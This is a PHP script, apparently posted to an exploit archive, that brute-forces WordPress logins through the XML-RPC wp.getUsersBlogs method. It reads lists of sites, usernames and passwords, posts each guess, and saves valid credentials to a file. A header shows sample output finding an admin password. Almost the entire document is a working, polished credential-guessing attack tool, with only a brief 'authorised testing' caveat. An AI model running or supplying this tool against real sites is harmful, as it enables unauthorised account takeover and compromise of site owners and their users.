
WordPress brute force via the XML-RPC interface

Author: n4sss , Published: 12-08-2014
<?php
/*
* Wordpress brute force via XMLRPC iface
*
* ---------------------
* V1.0:
* This version is a simple example of how to brute-force a WordPress login
* through the XML-RPC interface (the wp.getUsersBlogs method). Use it only
* against sites you are authorised to test.
* Construct the xmlrpc object with: Xmlrpc(Site list, User list, Wordlist) and launch the init method:
*
* $xml = new Xmlrpc('sites.txt', 'usernames.txt', 'wordlist.txt');
* $xml->init();
*
*
*
* rodrigo ~/repositorios/XmlRpcBrute (master) $ php wpXmlrpc.php
*
* __ __ _ _ _
* \ \ / / | | | | | |
* \ V / _ __ ___ | |_ __ _ __ ___ | |__ _ __ _ _| |_ ___
* > < | '_ ` _ \| | '__| '_ \ / __| | '_ \| '__| | | | __/ _ \
* / . \| | | | | | | | | |_) | (__ | |_) | | | |_| | || __/
* /_/ \_\_| |_| |_|_|_| | .__/ \___| |_.__/|_| \__,_|\__\___|
* | |
* |_|
* Site list: sites.txt
* User list: users.txt
* Wordlist: wordlist.txt
* Welcome to wp brute force via Xmlrpc iface.
* Checking if xmlrpc is available...
* [OK][http://exploit/wordpress/xmlrpc.php] Bruting via xmlrpc
* [-] http://exploit/wordpress/xmlrpc.php admin:123
* [-] http://exploit/wordpress/xmlrpc.php admin:1234
* [-] http://exploit/wordpress/xmlrpc.php admin:12345
* [-] http://exploit/wordpress/xmlrpc.php admin:123456
* [-] http://exploit/wordpress/xmlrpc.php admin:1234567
* [-] http://exploit/wordpress/xmlrpc.php admin:12345678
* [+][Valid Crendential] http://exploit/wordpress/xmlrpc.php admin:admin
*
*
* Valid credentials: valid_wp.txt
* Re-use the class :D
* ---------------------
*
* ---------------------
* Next (V2.0):
* Implements pthreads
* Users enumerate method
* ---------------------
*
* By Rodrigo "n4sss" <n-l4b@hotmail.com> Twt: @n4sss
* Greetx: xstpl_, MMxM -> perl l33t :3
*/

// Report every notice/warning while running, and lift the execution
// time limit so a long wordlist run is not killed mid-way.
error_reporting(E_ALL);
set_time_limit(0);


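class Xmlrpc{

    /** @var string|false Body of the last HTTP response (false when curl failed). */
    public $httpResponse;
    /** @var array Result of curl_getinfo() for the last availability probe. */
    public $httpinfo;
    /** @var string Path of the file valid credentials are appended to. */
    public $log;
    /** @var string User-Agent sent with every request. */
    public $userAgent;
    /** @var string|array Username list: a file path until init(), then one entry per line. */
    public $usrs;
    /** @var string|array Password list: a file path until init(), then one entry per line. */
    public $wordlist;
    /** @var string|array Site list: a file path until init(), then one entry per line. */
    public $uris;
    /** @var string Substring whose presence in a response marks a successful login. */
    public $match;
    /**
     * @var array Extra request headers. The original declared `$header` but
     *            always assigned/read `$headers`, leaving a dynamic property.
     */
    public $headers;
    /** @var string Last XML-RPC request body built by gemXml(). */
    public $xml;
    /** @var int Connect and transfer timeout in seconds. */
    public $timeout;
    /** @var string curl error text of the last failed request, '' otherwise. */
    public $lastError = '';


    /**
     * Construct class
     *
     * @param string $uris     Path of the file holding the URIs to test
     * @param string $usrs     Path of the file holding the usernames
     * @param string $wordlist Path of the file holding the passwords
     */
    function __construct($uris, $usrs, $wordlist){
        $this->uris = $uris;
        $this->usrs = $usrs;
        $this->wordlist = $wordlist;
        $this->log = 'valid_wp.txt';
        // wp.getUsersBlogs answers with a struct containing an isAdmin member
        // only when the credentials are accepted; a rejected login returns a fault.
        $this->match = '<name>isAdmin</name>';
        $this->userAgent = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0';
        // NOTE(review): XML-RPC conventionally uses text/xml; presumably WordPress
        // reads the raw POST body regardless of this header - confirm before changing.
        $this->headers = array('Content-Type: application/x-www-form-urlencoded');
        $this->timeout = 10;
    }

    function __destruct(){
        // Launch extra part to the final if you want
        echo "\n\nThanks for use. (:\n",
        "By n4sss < @n4sss >\n";
    }

    /**
     * Escape the five XML special characters so a credential cannot break
     * the request body. Done with str_replace rather than htmlspecialchars so
     * non-UTF-8 bytes in a wordlist are passed through unchanged.
     *
     * @param string $s
     * @return string
     */
    private function xmlEscape($s){
        // '&' is replaced first so the entities produced afterwards are not re-escaped.
        return str_replace(
            array('&', '<', '>', '"', "'"),
            array('&amp;', '&lt;', '&gt;', '&quot;', '&apos;'),
            $s
        );
    }

    /**
     * Gem a valid xml to given usr & pw
     *
     * @param string $usr
     * @param string $pw
     * @return string Xml with usr and pw (also stored in $this->xml)
     */
    function gemXml($usr, $pw){
        // Unescaped <, > or & in a password would make the server reject the
        // whole call, and the password would then be reported as invalid.
        $u = $this->xmlEscape($usr);
        $p = $this->xmlEscape($pw);
        $this->xml = "
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>$u</string></value></param>
<param><value><string>$p</string></value></param>
</params></methodCall>
";
        return $this->xml;
    }

    /**
     * Check xmlrpc status with a plain GET probe.
     *
     * NOTE(review): only confirms the URL answers HTTP 200 to a GET; newer
     * WordPress versions may answer a GET on xmlrpc.php with another status
     * even though POST works - confirm against the target before relying on it.
     *
     * @param string $uri
     * @return boolean true when the response code is exactly 200
     */
    function is_200($uri){
        $ch = curl_init($uri);
        // Return the body instead of printing it (the original used output buffering).
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
        // Timeouts so an unresponsive host cannot block the whole run.
        curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
        $this->httpResponse = curl_exec($ch);
        $this->httpinfo = curl_getinfo($ch);
        curl_close($ch); // the original leaked this handle
        return isset($this->httpinfo['http_code']) && (int)$this->httpinfo['http_code'] === 200;
    }

    /**
     * POST an XML-RPC body to $site and return the response body.
     *
     * @param string $site Full xmlrpc.php URL
     * @param string $body Request body
     * @return string|false Response body, or false when the request failed
     *                      (the curl error text is kept in $this->lastError)
     */
    private function postXml($site, $body){
        $ch = curl_init($site);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $this->headers);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
        curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
        curl_setopt($ch, CURLOPT_ENCODING, ''); // accept any compression curl supports
        $response = curl_exec($ch);
        $this->lastError = ($response === false) ? curl_error($ch) : '';
        curl_close($ch);
        return $response;
    }

    /**
     * Test usrs into xmlrpc iface
     *
     * Walks every site in $this->uris; for each site every user/password
     * pair is tried until a hit is found for that user. Unlike the original,
     * an unreachable site, an HTTPS site (not supported by this version) or a
     * found credential no longer exit() the process, so the remaining sites
     * and users are still tested.
     *
     * @return void
     */
    function bruteXml(){
        foreach($this->uris as $site):
            $site = trim($site);
            if($site === '') continue;
            // Prefix checks instead of strstr(): the original matched 'https'/'http'
            // anywhere in the string, so 'example.com/https-stuff' was mis-detected.
            if(strncasecmp($site, 'https://', 8) === 0){
                echo "[-] Https env , skipping {$site}\n";
                continue;
            }
            if(strncasecmp($site, 'http://', 7) !== 0) $site = 'http://' . $site;
            // rtrim avoids 'host//xmlrpc.php' when the list entry ends with a slash.
            if(strpos($site, 'xmlrpc.php') === false) $site = rtrim($site, '/') . '/xmlrpc.php';
            echo "Checking if xmlrpc is available...\n";
            if(!$this->is_200($site)){ // Check if xmlrpc is on
                echo "[-][{$site}] Xmlrpc iface not available, skipping\n";
                continue;
            }
            echo "[OK][{$site}] Bruting via xmlrpc\n";
            foreach($this->usrs as $usr):
                foreach($this->wordlist as $pw):
                    $body = $this->gemXml($usr, $pw); // Init the xml body
                    $this->httpResponse = $this->postXml($site, $body);
                    if($this->httpResponse === false){
                        // A transport failure is not a wrong password; say so instead
                        // of printing it as '[-]' (strstr() on false was the old behaviour).
                        echo sprintf("[!] %s %s:%s request failed: %s\n", $site, $usr, $pw, $this->lastError);
                        continue;
                    }
                    if(strpos($this->httpResponse, $this->match) !== false){
                        $msg = sprintf("[+][Valid Crendential] %s %s:%s\n", $site, $usr, $pw);
                        echo $msg;
                        file_put_contents($this->log, $msg, FILE_APPEND);
                        continue 2; // password found for this user: move on to the next user
                    }
                    echo sprintf("[-] %s %s:%s\n", $site, $usr, $pw);
                endforeach;
            endforeach;
        endforeach;
    }

    /**
     * Read a list file into one entry per line.
     *
     * Strips a trailing "\r" (CRLF files) and drops empty lines only. The
     * original array_filter() also dropped a line consisting of "0", which is
     * a legitimate password.
     *
     * @param string $path
     * @return array
     */
    public function readLines($path){
        $raw = file_get_contents($path);
        if($raw === false) exit("File {$path} not found!\n");
        $lines = array();
        foreach(explode("\n", $raw) as $line){
            $line = rtrim($line, "\r");
            if($line !== '') $lines[] = $line;
        }
        return $lines;
    }

    /**
     * init array and bruteFunction
     *
     * @return void
     */
    function init(){
        echo "Welcome to wp brute force via Xmlrpc iface.\n";
        $this->uris = $this->readLines($this->uris);
        $this->usrs = $this->readLines($this->usrs);
        $this->wordlist = $this->readLines($this->wordlist);
        $this->bruteXml();
    }
}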

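// ~$ php wp_xmlrpc.php
// Interactive entry point: prints the banner, asks for the three list files
// on STDIN, checks they are readable regular files, then runs the brute force.
echo "
__ __ _ _ _
\ \ / / | | | | | |
\ V / _ __ ___ | |_ __ _ __ ___ | |__ _ __ _ _| |_ ___
> < | '_ ` _ \| | '__| '_ \ / __| | '_ \| '__| | | | __/ _ \
/ . \| | | | | | | | | |_) | (__ | |_) | | | |_| | || __/
/_/ \_\_| |_| |_|_|_| | .__/ \___| |_.__/|_| \__,_|\__\___|
| |
|_| ",
"\nSite list: ";
$site_list = trim((string)fgets(STDIN));
echo "User list: ";
$user_list = trim((string)fgets(STDIN));
echo "Wordlist: ";
$wordlist = trim((string)fgets(STDIN));
// is_file()/is_readable() instead of file_exists(): a directory or an
// unreadable file passed the old check and only failed later inside init().
foreach(array($site_list, $user_list, $wordlist) as $file){
    if(!is_file($file) || !is_readable($file)) exit("File {$file} not found!\n");
}
$xml = new Xmlrpc($site_list, $user_list, $wordlist);
$xml->init();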
